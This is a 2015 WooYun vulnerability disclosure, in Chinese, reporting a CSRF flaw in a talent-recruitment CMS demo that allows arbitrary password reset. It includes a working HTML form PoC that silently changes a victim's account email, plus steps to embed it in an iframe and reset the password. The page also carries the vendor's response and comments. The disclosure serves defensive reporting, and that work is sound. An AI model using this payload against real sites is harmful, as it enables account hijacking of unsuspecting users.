当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101304

漏洞标题:某人才系统CSRF导致任意用户密码重置(Demo演示)

相关厂商:finereason.com

漏洞作者: 90Snake

提交时间:2015-03-17 10:13

修复时间:2015-06-18 14:52

公开时间:2015-06-18 14:52

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向第三方安全合作伙伴开放
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

一个简单的CSRF引发的任意用户密码重置

详细说明:

一个简单的CSRF引发的任意用户密码重置
http://v2014.rccms.com 官方Demo

漏洞证明:

1111.jpg


构造表单

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://v2014.rccms.com/member/index.php?m=user_email&do=saveemail&show=safe" method="POST">
<input type="hidden" name="email" value="butiantest@126.com" />
<input type="hidden" name="sendmail" value="1" />
<input type="hidden" name="submit" value="ÐÞ&#184;ÄÓÊÏä" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


然后用iframe标签嵌入到一个网页中,即可实施CSRF攻击,修改目标邮箱
然后找回密码

22222.jpg

修复方案:

加token

版权声明:转载请注明来源 90Snake@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-20 14:51

厂商回复:

首先感谢提交,但是 内容写的太简单,实在看不明白,能不能补充详细一些,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-20 15:02 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    @finereason.com 留一下联系方式,我给你详细的说下

  2. 2015-06-07 20:59 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    @90Snake 继续下去。看好你的CSRF

  3. 2015-06-08 01:08 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    @明月影 学会了吗?

  4. 2015-06-08 13:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    @90Snake 还看不到漏洞内容。